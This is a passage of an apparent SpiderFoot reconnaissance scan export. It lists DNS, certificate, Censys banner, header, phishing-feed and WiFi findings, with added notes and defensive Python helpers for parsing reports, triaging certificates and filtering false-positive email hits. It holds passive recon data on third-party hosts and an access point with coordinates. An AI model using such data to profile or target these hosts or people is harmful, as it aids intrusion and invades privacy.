(Indicator: "twitter")\n "if (!window.isInIFrame && /twitter/i.test(navigator.userAgent) && window.playerConfig.video.url) {" (Indicator: "twitter")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar300.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id' | 185.199.110.153 |
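The Hybrid Analysis cell above is not JSON: it is a Python 2 `repr` (`u'...'` strings, `None`), so `json.loads()` rejects it and the record has to be read with `ast.literal_eval`. The following is an added example, not SpiderFoot's or Hybrid Analysis's own code; the sample cell is constructed in the same shape as the row above (same keys, a subset of the signatures), and the summary reports the sandbox `threat_score` next to the highest per-signature `threat_level` so the analyst can see whether the signatures shown actually support the score.

```python
import ast

# Constructed sample cell in the shape of the Hybrid Analysis row above:
# a Python 2 repr (u'' strings, None) rather than JSON. Raw string so the
# "\\" and "\n" escapes reach literal_eval exactly as the export carries them.
SAMPLE_CELL = r'''[{u'submit_name': u'http://www.coolroof.biz/', u'threat_score': 100,
u'environment_id': 100, u'signatures': [
{u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id': None,
u'threat_level': 0, u'threat_level_human': u'informative',
u'description': u'"Local\\URLBLOCK_DOWNLOAD_MUTEX"'},
{u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id': u'T1071',
u'threat_level': 0, u'threat_level_human': u'informative',
u'description': u'"23.235.199.120:80"\n "185.199.110.153:443"'},
{u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id': u'T1071.004',
u'threat_level': 0, u'threat_level_human': u'informative',
u'description': u'"birdeye.com"\n "www.coolroof.biz"'}]}]'''


def load_report_cell(cell):
    """Parse the Python-repr cell into a list of report dicts (json.loads would fail)."""
    return ast.literal_eval(cell)


def summarize(report):
    """Score, signature count, ATT&CK IDs and the highest signature-level threat."""
    sigs = report.get("signatures", [])
    attck = sorted({s["attck_id"] for s in sigs if s.get("attck_id")})
    max_level = max((s.get("threat_level", 0) for s in sigs), default=0)
    return {
        "submit_name": report.get("submit_name"),
        "threat_score": report.get("threat_score"),
        "signature_count": len(sigs),
        "attck_ids": attck,
        # If this stays at 0 while threat_score is high, read the signatures
        # rather than trusting the aggregate number.
        "max_signature_threat_level": max_level,
    }


def network_endpoints(report):
    """host:port pairs from the 'Contacts server' signature, one per description line."""
    out = []
    for s in report.get("signatures", []):
        if s.get("identifier", "").startswith("network-") and s.get("name") == "Contacts server":
            for line in s.get("description", "").splitlines():
                out.append(line.strip().strip('"'))
    return out


if __name__ == "__main__":
    for rep in load_report_cell(SAMPLE_CELL):
        print(summarize(rep))
        print(network_endpoints(rep))
```

The endpoints pulled from the "Contacts server" signature are what you would cross-reference against the other rows of the export (185.199.110.153 is the GitHub Pages address this row is keyed on).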
| 2023-05-12 03:24:50 | Country | No | Country Name Extractor | 0 | 0 | 3 | 0 | None | United States | acilacikveteriner.com |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | RumbleUser (Category: political)
https://rumble.com/user/login | login |
| 2023-05-12 03:13:06 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [007us.github.io]
https://www.openphish.com/feed.txt | 007us.github.io |
| 2023-05-12 03:00:49 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 0-oo.github.io | 185.199.111.153 |
| 2023-05-12 02:50:15 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
c7:83:d8:18:48:a0:26:ac:0e:41:bf:5e:7d:c6:c3:07
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Google Trust Services LLC, CN=GTS CA 1P5
Validity
Not Before: Jan 17 09:16:26 2023 GMT
Not After : Apr 17 09:16:25 2023 GMT
Subject: CN=*.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:c9:69:39:93:28:ab:3e:d3:a5:d5:a5:72:cd:be:
43:92:fc:b1:41:1e:65:40:ba:b6:a5:98:c9:0a:c1:
0a:16:38:c6:f0:6f:13:8a:f1:50:6e:63:c7:c9:4d:
3d:84:6a:35:2b:f1:16:92:ef:9c:26:1f:97:22:55:
e7:7e:fd:a5:40:94:99:7b:2a:b2:9f:89:9a:e1:30:
e0:1b:38:af:f1:7d:fe:1d:f3:e2:fc:ad:49:66:7b:
1e:5b:c2:73:59:c0:35:17:1a:cb:8b:a8:f6:c4:6d:
b8:77:b7:bc:64:fb:68:2f:62:4e:80:30:15:70:8f:
2d:50:8e:a9:f6:b0:b5:02:42:f1:48:e2:81:92:3e:
44:a6:5b:69:a6:54:e5:ee:c1:74:2a:c1:ec:11:dc:
59:f2:1e:65:9f:eb:94:d2:24:cd:99:20:ee:91:26:
11:c9:44:8f:62:f0:c5:34:f8:77:d4:9d:29:a7:42:
e2:30:2c:71:73:82:02:34:4e:a9:30:9a:b9:ab:95:
0a:72:71:e0:79:05:25:70:cd:6a:cc:a1:b4:51:7d:
04:6f:2b:68:12:e1:a4:1d:84:68:0d:5c:76:58:33:
de:fd:16:f6:1b:5f:7b:dc:4d:c0:66:3d:ae:d0:46:
c8:c8:e1:83:f9:b8:7a:33:57:f8:8e:90:08:fd:c7:
e2:e9
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
31:FB:31:C7:D3:F3:CF:11:AF:91:FA:E4:71:40:41:2F:C4:66:90:11
X509v3 Authority Key Identifier:
keyid:D5:FC:9E:0D:DF:1E:CA:DD:08:97:97:6E:2B:C5:5F:C5:2B:F5:EC:B8
Authority Information Access:
OCSP - URI:http://ocsp.pki.goog/s/gts1p5/mFVJO6PGh8g
CA Issuers - URI:http://pki.goog/repo/certs/gts1p5.der
X509v3 Subject Alternative Name:
DNS:*.battleb0t.xyz, DNS:battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.11129.2.5.3
X509v3 CRL Distribution Points:
Full Name:
URI:http://crls.pki.goog/gts1p5/Zn3bDrcK0Gs.crl
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
8f:de:2d:05:92:69:48:3c:56:fc:22:08:a2:35:bd:c8:57:65:
b5:6f:33:0c:aa:bc:76:e8:1d:42:77:47:bc:ae:0e:80:ed:dd:
d3:8e:f7:0f:aa:49:99:2e:fb:bb:2f:e3:ed:b0:fc:04:11:23:
70:ae:f2:d5:ad:55:18:89:fd:c2:f1:f7:ab:64:01:10:ce:86:
6e:5a:5f:19:d1:b4:39:19:cf:7c:c2:bd:e3:c7:5a:bd:91:f4:
86:d0:db:9a:02:e1:5f:ff:08:f2:7f:c9:ca:5d:f9:53:49:db:
4d:e4:6b:a2:d8:53:33:76:e9:c8:7d:9b:a1:37:1c:e1:fd:14:
c0:c4:e2:28:fe:cc:ba:5c:25:d8:86:52:ce:0d:c5:7f:e7:b5:
d9:3e:e1:65:14:17:4f:8c:55:fc:01:58:43:fe:c7:c5:4b:26:
e2:ea:0b:c9:ff:2c:52:b5:ab:00:e9:06:49:51:c2:01:ca:b5:
6a:c4:ae:a2:17:c3:86:ec:ec:a7:72:a4:4e:b6:4e:3e:d9:0b:
df:8f:84:de:6a:96:ce:0d:8d:26:ac:b2:5c:45:1f:a0:e5:df:
88:dd:84:9f:fe:46:1e:e9:a2:91:bb:ae:08:4d:ff:a2:51:db:
43:d0:e5:a3:df:91:dd:52:a9:23:85:54:e1:34:57:f4:c7:f8:
24:6b:63:ba
|
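The certificate in the row above carries `CT Precertificate Poison: critical`, so it is a precertificate pulled from a CT log: it proves that GTS issued for `*.battleb0t.xyz`, not that any host ever served it, and its `Not After` (Apr 17 2023) is before the scan date (May 12 2023). The following is an added example, not SpiderFoot's code, that parses `openssl x509 -text` output as it appears in this export (indentation stripped) and returns those caveats; the sample is the row's own certificate with the modulus and signature bytes omitted, and the scan time is taken from the row's first column.

```python
import re
from datetime import datetime, timezone

# Constructed from the battleb0t.xyz row above, key material omitted.
# The export lost the indentation, so parsing must not rely on it.
SAMPLE_CERT_TEXT = """Certificate:
Data:
Version: 3 (0x2)
Serial Number:
c7:83:d8:18:48:a0:26:ac:0e:41:bf:5e:7d:c6:c3:07
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Google Trust Services LLC, CN=GTS CA 1P5
Validity
Not Before: Jan 17 09:16:26 2023 GMT
Not After : Apr 17 09:16:25 2023 GMT
Subject: CN=*.battleb0t.xyz
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Alternative Name:
DNS:*.battleb0t.xyz, DNS:battleb0t.xyz
CT Precertificate Poison: critical
NULL
"""

# "Date Found" of the row above.
SCAN_TIME = datetime(2023, 5, 12, 2, 50, 15, tzinfo=timezone.utc)


def _parse_openssl_date(s):
    # openssl pads single-digit days with a space ("Jan  7 ..."); collapse it.
    s = " ".join(s.replace("GMT", "").split())
    return datetime.strptime(s, "%b %d %H:%M:%S %Y").replace(tzinfo=timezone.utc)


def _value_after(header, text):
    """First non-empty line following `header`, whatever the indentation."""
    m = re.search(re.escape(header) + r"[^\n]*\n\s*([^\n]+)", text)
    return m.group(1).strip() if m else ""


def parse_cert_text(text):
    """Pull the fields an analyst triages out of `openssl x509 -text` output."""
    subject = re.search(r"^\s*Subject:\s*(.+)$", text, re.M)
    issuer = re.search(r"^\s*Issuer:\s*(.+)$", text, re.M)
    nb = re.search(r"Not Before\s*:\s*(.+)", text)
    na = re.search(r"Not After\s*:\s*(.+)", text)
    san_line = _value_after("X509v3 Subject Alternative Name:", text)
    sans = [e.split(":", 1)[1] for e in san_line.split(", ") if ":" in e]
    eku_line = _value_after("X509v3 Extended Key Usage:", text)
    ca = re.search(r"CA:(TRUE|FALSE)", text)
    return {
        "subject": subject.group(1).strip() if subject else "",
        "issuer": issuer.group(1).strip() if issuer else "",
        "not_before": _parse_openssl_date(nb.group(1)) if nb else None,
        "not_after": _parse_openssl_date(na.group(1)) if na else None,
        "sans": sans,
        "eku": [e.strip() for e in eku_line.split(",")] if eku_line else [],
        "is_ca": bool(ca and ca.group(1) == "TRUE"),
        # RFC 6962 poison extension: this blob came from a CT log, not a TLS handshake.
        "is_precert": "CT Precertificate Poison" in text,
    }


def triage(cert, now):
    """Caveats a passive-scan certificate finding should carry."""
    findings = []
    if cert["is_precert"]:
        findings.append("precertificate (CT poison): proves issuance, not deployment")
    if cert["not_after"] and cert["not_after"] < now:
        findings.append("expired before scan time (%s)" % cert["not_after"].date())
    if cert["not_before"] and cert["not_before"] > now:
        findings.append("not yet valid at scan time")
    if any(n.startswith("*.") for n in cert["sans"]):
        findings.append("wildcard SAN: hostnames cannot be enumerated from this certificate")
    if cert["is_ca"]:
        findings.append("CA:TRUE on a certificate presented as a leaf")
    return findings


if __name__ == "__main__":
    for line in triage(parse_cert_text(SAMPLE_CERT_TEXT), SCAN_TIME):
        print("-", line)
```

The same function runs over the ayhu.xyz certificate earlier in the table, which has SCTs rather than the poison extension and so is the final certificate, not a precertificate.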
| 2023-05-12 02:46:16 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Microsoft websites | battleb0t.github.io |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | x-proxy-cache: MISS | {"content-length": "690", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-4fb\"", "x-cache-hits": "1", "cache-control": "max-age=600", "x-served-by": "cache-lga21959-LGA", "x-cache": "HIT", "x-github-request-id": "F620:0A4B:1087FED:17E0EF4:645DA7F4", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 02:54:04 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "88b13ec8ddf02c1379830d22f861ddb1826456ec", "date": "Fri, 12 May 2023 02:54:15 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "562", "x-timer": "S1683860056.740489,VS0,VE2", "server": "GitHub.com", "connection": "keep-alive", "content-type": "text/html; charset=utf-8"} |
| 2023-05-12 03:00:26 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | chacha20-poly1305@openssh.com | {"operating_system": {"product": "Linux", "vendor": "Debian", "version": "10.2", "other": {"family": "Linux"}, "uniform_resource_identifier": "cpe:2.3:o:debian:debian_linux:10.2:*:*:*:*:*:*:*", "part": "o"}, "last_updated_at": "2023-05-11T13:12:22.896Z", "ip": "64.226.81.43", "labels": ["remote-access"], "location_updated_at": "2023-05-04T23:08:56.702518Z", "autonomous_system_updated_at": "2023-05-04T23:08:56.702593Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"kvydol.easypanel.host": {"record_type": "A", "resolved_at": "2023-05-05T17:01:10.039852254Z"}, "kekw.battleb0t.xyz": {"record_type": "A", "resolved_at": "2023-05-09T21:51:41.360251198Z"}, "wordpress-971118-3396556.cloudwaysapps.com": {"record_type": "A", "resolved_at": "2023-05-02T09:46:47.851165352Z"}}, "names": ["kvydol.easypanel.host", "kekw.battleb0t.xyz", "wordpress-971118-3396556.cloudwaysapps.com"], "reverse_dns": {"resolved_at": "2023-04-25T12:49:47.725442827Z", "names": ["971118.cloudwaysapps.com"]}}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:989054422845f7fb4a0f578fbb62a589973974ff9b7310e0eee11f9d1819efdb"], "source_ip": "167.94.145.60", "extended_service_name": "SSH", "observed_at": "2023-05-11T11:58:34.839347829Z", "banner_hex": "5353482d322e302d4f70656e5353485f372e3970312044656269616e2d31302b64656231307532", "perspective_id": "PERSPECTIVE_ORANGE", "transport_fingerprint": {"raw": "65160,64,true,MSTNW,1460,false,false", "os": "CentOS", "id": 262}, "banner": 
"SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "0172e87daef36c52da4bd5592787fb64e976f73f4f61384a12164ac56f2ce5a1", "rsa_public_key": {"_encoding": {"modulus": "DISPLAY_BASE64", "exponent": "DISPLAY_BASE64"}, "length": 2048, "modulus": "uPxDpRdIrA/iz2ExEgRAxKmXST2zSxUUASzEIsL6O2PTrSNc6umFNFt/dHdxbK0YoU5gp4vR8iK16J/is3qdC1O0ZbGjQDlTCf7Ot9E/wR2JFzowSc1s9mpCkXPL2tjFtwBDcuHkmqou6ryP5VE5ak4jNCg57zigC0YIUbaIQBZ2jxMULPFDZH04Sm7BCi6dspyzcLPQj8OZRf2GyAISVhP0sEJYaziXVgNTRAQlqfYIDf9Nzlq1NseWj/r6MQ8+fir5bRq/WXlDIO3L0kx/XXBOQazwt1JhrESalbK3qpruuXFPUsHNFo5uT3KgeXHGYW3PgarxkIAvPDmJRHKYqQ==", "exponent": "AAEAAQ=="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ssh-rsa", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ssh-rsa"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256", "diffie-hellman-group14-sha1"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": 
["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Debian-10+deb10u2", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_7.9p1", "raw": "SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2"}, "hassh_fingerprint": "b12d2871a1189eff20364cf5333619ee"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Debian-10+deb10u2"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "7.9", "update": "p1", "source": "OSI_APPLICATION_LAYER", "part": "a", "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:7.9:p1:*:*:*:*:*:*", "other": {"family": "OpenSSH"}}, {"product": "Linux", "vendor": "Debian", "version": "10.2", "source": "OSI_APPLICATION_LAYER", "other": {"family": "Linux"}, "uniform_resource_identifier": "cpe:2.3:o:debian:debian_linux:10.2:*:*:*:*:*:*:*", "part": "o"}]}, {"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "http": {"request": {"headers": {"_encoding": {"User_Agent": "DISPLAY_UTF8", "Accept": "DISPLAY_UTF8"}, "User_Agent": ["Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"], "Accept": ["*/*"]}, "method": "GET", "uri": "http://64.226.81.43/"}, "response": {"body": "<!DOCTYPE html>\n<html>\n <iframe src=\"https://cloudways-static-content.s3.us-east-1.amazonaws.com/error_page/maintenance-domain-mapping.html\" frameborder=\"0\" 
style=\"overflow:hidden;overflow-x:hidden;overflow-y:hidden;height:100%;width:100%;position:absolute;top:0px;left:0px;right:0px;bottom:0px\" height=\"100%\" width=\"100%\"></iframe>\n</html> ", "_encoding": {"body": "DISPLAY_UTF8", "body_hash": "DISPLAY_UTF8"}, "protocol": "HTTP/1.1", "headers": {"_encoding": {"Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Etag": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Vary": ["Accept-Encoding"], "Server": ["nginx"], "Connection": ["keep-alive"], "Etag": ["W/\"64217dc5-156\""], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]}, "body_hashes": ["sha256:d5e3078cb88ba53faa1d104c27054d2a8ff92665b4c02144f55489bf5c254016", "sha1:5d4eb7befed38d050a2b1adaa91de040a5beb9bf"], "status_code": 403, "body_hash": "sha1:5d4eb7befed38d050a2b1adaa91de040a5beb9bf", "body_size": 342, "status_reason": "Forbidden"}, "supports_http2": false}, "truncated": false, "service_name": "HTTP", "_decoded": "http", "banner_hashes": ["sha256:888a2d848f3d16b40c32b4ff30abaadaacb398a98d5a44f4a0237b14ce63d529"], "source_ip": "167.248.133.36", "extended_service_name": "HTTP", "observed_at": "2023-05-11T05:48:53.194396164Z", "banner_hex": "485454502f312e312034303320466f7262696464656e0d0a5365727665723a206e67696e780d0a446174653a20203c52454441435445443e0d0a436f6e74656e742d547970653a20746578742f68746d6c0d0a5472616e736665722d456e636f64696e673a206368756e6b65640d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a566172793a204163636570742d456e636f64696e670d0a455461673a20572f2236343231376463352d313536220d0a436f6e74656e742d456e636f64696e673a20677a69700d0a", "perspective_id": "PERSPECTIVE_NTT", "banner": "HTTP/1.1 403 Forbidden\r\nServer: nginx\r\nDate: <REDACTED>\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nVary: Accept-Encoding\r\nETag: W/\"64217dc5-156\"\r\nContent-Encoding: gzip\r\n", "port": 80, "software": [{"product": "nginx", "vendor": "nginx", "source": 
"OSI_APPLICATION_LAYER", "part": "a", "uniform_resource_identifier": "cpe:2.3:a:f5:nginx:*:*:*:*:*:*:*:*", "other": {"family": "nginx"}}]}, {"tls": {"version_selected": "TLSv1_3", "certificates": {"_encoding": {"chain_fps_sha_256": "DISPLAY_HEX", "leaf_fp_sha_256": "DISPLAY_HEX"}, "chain_fps_sha_256": ["7fa4ff68ec04a99d7528d5085f94907f4d1dd1c5381bacdc832ed5c960214676", "68b9c761219a5b1f0131784474665db61bbdb109e00f05ca9f74244ee5f5f52b", "d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef4"], "chain": [{"issuer_dn": "C=US, ST=New Jersey, L=Jersey City, O=The USERTRUST Network, CN=USERTrust RSA Certification Authority", "subject_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA", "fingerprint": "7fa4ff68ec04a99d7528d5085f94907f4d1dd1c5381bacdc832ed5c960214676"}, {"issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "subject_dn": "C=US, ST=New Jersey, L=Jersey City, O=The USERTRUST Network, CN=USERTrust RSA Certification Authority", "fingerprint": "68b9c761219a5b1f0131784474665db61bbdb109e00f05ca9f74244ee5f5f52b"}, {"issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "subject_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "fingerprint": "d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef4"}], "leaf_data": {"pubkey_algorithm": "RSA", "public_key": {"key_algorithm": "RSA", "rsa": {"_encoding": {"modulus": "DISPLAY_BASE64", "exponent": "DISPLAY_BASE64"}, "length": 256, "modulus": "0TpnPayT/qE4F6J4qzOiK7JhnrAo9bFLNo2svrHA/v0LaIOAybJrnc5AyyYwgS6PTnc5WMsgwlVeIH5TInjmeEsEinXaSlGOrsV7Gm/ZW+7PMzYrK4KMP7g5Pv95Q5JU7FTQvxHAzRGxkvPDzcyogoNJIk1KXgVLPxdUyd+B1UFVrTMrqAkIf0M1HRzdWlOHv+OEsQ2QjcnXP0mIdDF6sbDns9klIt09P59g0zL++OZSIkvbIRKyvkKcmp+73HQRF0pjn2SY2RJKMExBzgIlPDKzcHLqDMPRl2zP8TcIdzRjF/X4rRYa64yxqmMYIDs4WPnhkpo7c5uTK7f4TFIU1Q==", 
"exponent": "AAEAAQ=="}, "fingerprint": "e577b60ecc733cd981273f877b2ab03d93986490630d699801165ebbec0a48cf"}, "subject_dn": "CN=*.cloudwaysapps.com", "pubkey_bit_size": 2048, "fingerprint": "46c14572bed6bb1c8797e7a0292d295e561d717b22535af514608f0d2fe40802", "issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA", "names": ["*.cloudwaysapps.com", "cloudwaysapps.com"], "tbs_fingerprint": "f9537ad843dfc5f6c9ec168dd4c17c3b |
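The "Affiliate - Email Address" row above is a false positive: `chacha20-poly1305@openssh.com` is an OpenSSH cipher name taken from the server's KEX_INIT list in the Censys record, not a mailbox. RFC 4251 private algorithm names take the form `name@domainname`, so any `@` regex will match them. The following is an added example, not SpiderFoot's extractor, that classifies regex hits against the algorithm names advertised in the same record plus a maintained list of SSH extension domains (the list and the contact address in the sample record are assumptions for the example; the record is constructed in the shape of the Censys document above).

```python
import json
import re

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")

# Assumed: suffixes used by private SSH algorithm names (RFC 4251 section 6).
# Extend as new vendor suffixes show up in banners.
SSH_EXTENSION_DOMAINS = {"openssh.com", "libssh.org", "ssh.com"}

# Constructed record shaped like the Censys SSH/HTTP document in the row above;
# the contact address in the HTTP body is made up for the example.
SAMPLE_RECORD = {
    "ip": "64.226.81.43",
    "services": [
        {
            "service_name": "SSH",
            "banner": "SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2",
            "ssh": {"kex_init_message": {
                "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org"],
                "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr",
                                             "aes256-gcm@openssh.com"],
                "client_to_server_macs": ["umac-64-etm@openssh.com", "hmac-sha2-256"],
                "client_to_server_compression": ["none", "zlib@openssh.com"],
            }},
        },
        {
            "service_name": "HTTP",
            "http": {"response": {"body": "<p>Contact: security@example.com</p>"}},
        },
    ],
}


def ssh_algorithm_names(record):
    """Every algorithm name the record's SSH KEX_INIT lists advertise."""
    names = set()
    for svc in record.get("services", []):
        kex = svc.get("ssh", {}).get("kex_init_message", {})
        for value in kex.values():
            if isinstance(value, list):
                names.update(value)
    return names


def classify_email_candidates(record):
    """Split regex hits into (probable mailboxes, SSH algorithm names)."""
    text = json.dumps(record)
    known_algos = ssh_algorithm_names(record)
    emails, algos = [], []
    for cand in sorted(set(EMAIL_RE.findall(text))):
        domain = cand.rsplit("@", 1)[1].lower()
        # Either the token is literally one of the advertised algorithms, or it
        # carries a vendor suffix that only ever appears on algorithm names.
        if cand in known_algos or domain in SSH_EXTENSION_DOMAINS:
            algos.append(cand)
        else:
            emails.append(cand)
    return emails, algos


if __name__ == "__main__":
    mail, algs = classify_email_candidates(SAMPLE_RECORD)
    print("mailboxes:", mail)
    print("algorithm names dropped:", algs)
```

The context check (membership in the record's own KEX_INIT lists) catches suffixes the static list does not know about yet; the static list catches the same names when they surface in a cell that no longer carries the surrounding JSON.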
| 2023-05-12 03:01:37 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.142): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:53:52 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"X_Cache": "DISPLAY_UTF8", "Via": "DISPLAY_UTF8", "X_Github_Request_Id": "DISPLAY_UTF8", "Age": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "X_Served_By": "DISPLAY_UTF8", "X_Cache_Hits": "DISPLAY_UTF8", "X_Timer": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Etag": "DISPLAY_UTF8", "X_Fastly_Request_Id": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Content_Security_Policy": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Accept_Ranges": "DISPLAY_UTF8"}, "Via": ["1.1 varnish"], "X_Github_Request_Id": ["80B6:49F3:235A56C:358722C:645CDF0C"], "Age": ["0"], "Vary": ["Accept-Encoding"], "X_Served_By": ["cache-chi-kigq8000067-CHI"], "X_Cache_Hits": ["0"], "X_Timer": ["S1683808012.126331,VS0,VE23"], "Connection": ["keep-alive"], "Etag": ["W/\"64556a8c-239b\""], "X_Fastly_Request_Id": ["68f03409faf68cb6eb3782ac00da0088b30b8906"], "Content_Type": ["text/html; charset=utf-8"], "Date": ["<REDACTED>"], "X_Cache": ["MISS"], "Content_Security_Policy": ["default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'"], "Server": ["GitHub.com"], "Accept_Ranges": ["bytes"]} | 2606:50c0:8003::153 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Alparslan (Net ID: 00:08:5C:FF:1B:97) | 40.2024, 29.0398 |
| 2023-05-12 02:55:01 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
